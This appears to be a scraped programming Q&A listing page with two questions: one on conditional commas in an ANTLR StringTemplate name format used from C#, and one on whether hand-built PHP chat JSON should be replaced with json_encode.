    We are using Antlr StringTemplates to give control over how a Entity's Name is output. The basic Stringtemplate is $FirstName$ $Initial$ $LastName$, $Suffix$, $Degree$ I want to add some smarts to that template so that the commas are only output when necessary i.e. The first comma is only output when there is a Suffix or Degree and the second commas is only output if there is a suffix. I tried the following template string bit it does not work. I guess I have misunderstood $FirstName$ $Initial$ $LastName$ <if(Suffix|Degree)>,<endif>, $Suffix$ <if(Suffix)>,<endif> $Degree$ If it helps we process the templates using this C# StringTemplate stringtemplate = new Antlr.StringTemplate.StringTemplate(template.Data); foreach (Pair<string, string> pair in dictionary) { if (pair.First != null && pair.Second != null) { stringtemplate.SetAttribute(pair.First, pair.Second); } } return stringtemplate.ToString();

    Read the article

  • is this valid json array using php

    - by Rich
    Hello, I need to convert some code done by someone else, to work in my mvc model It is using some functions like EOD that I don't understand. Does that still work in a class? Primarely, my question focusus on the json output. The old code does not use the php json_encode function, but outputs it directly like this ?> { "username": "<?php echo $_SESSION['username'];?>", "items": [ <?php echo $items;?> ] } <?php I would do it like this, but I need to be sure it's right for the items part header('Content-type: application/json'); $output = array("username"=> isset( $_SESSION['username'] ) ? $_SESSION['username'] : "?", "items"=>$items ); $this->content = json_encode($output); This is some background on how the $items is made. An item is stored like this: $_SESSION['chatHistory'][$_POST['to']] .= <<<EOD { "s": "1", "f": "{$to}", "m": "{$messagesan}" }, EOD; and it is put in the $items variable like this $items = ''; if ( !empty($_SESSION['openChatBoxes'] ) ) { foreach ( $_SESSION['openChatBoxes'] as $chatbox => $void ) { $items .= $this->chatBoxSession($chatbox); } } //The chatBoxSession() function takes an item from the $_SESSION['chatHistory'] array and returns it. I hope this was somewhat clear enough? The php manual warns that in some cases you don't get an array output, instead you get an object. So, with the EOD syntax, I am not really sure. It could save me some time if I know some things are doing what they supposed too, and giving the right output. thanks, Richard

    Read the article

< Previous Page | 94 95 96 97 98 99 100 101 102 103 104 105  | Next Page >